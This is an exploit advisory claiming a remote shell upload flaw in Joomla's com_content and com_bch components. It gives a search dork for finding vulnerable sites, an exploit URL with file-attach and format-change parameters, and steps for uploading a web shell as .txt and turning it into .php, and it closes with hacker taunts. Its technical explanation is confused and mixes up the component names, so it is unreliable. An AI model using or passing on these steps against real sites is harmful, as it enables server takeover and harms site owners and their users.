Joomla content and bch components suffer from a remote shell upload vulnerability.
156fb5eff2ac666b061fdfd50d6fe3735cdc4a5d9a794a7e07a40893f427c5d2
[ Joomla com_content Shell Upload Vulnerability]
[x] Author : Agd_Scorp
[x] Home : www.turkguvenligi.info (former)
[x] E-mail : vorscorp@hotmail.com
[x] Found : Mon, Dec 24, 2012
[x] Tested : Windows 7, Ubuntu, Gentoo
[x] Dork : inurl:"/index.php?option=com_bch"
________________________________________________________________
****************************************************************
[x] The Conlusion
The vulnerability resides at 'cont' parameter, which is often used for reconnecting the SQL database to the website in-order to gain information that is being provided by the administrator, although, if a few parameters are added as an extention-act, files can be uploaded, and therefore, more risk shall occur.
[x] Vuln Exploit Report:
http://localhost/index.php?option=com_content&cont=sendfile?controller&attach_file=[FILE LINK]&chformat=php (or any other you want it to change into)
[x] Uploading a Shell
First, change your shell's format into .txt, then extract into that, when uploaded, and chformat parameter is added, it will be automatically be changed into *.php, therefore, your shell is spawned.
[x] Note:
h4ck y0u...
kill y0u...
0wn y0u....
- TURKGUVENLIGI -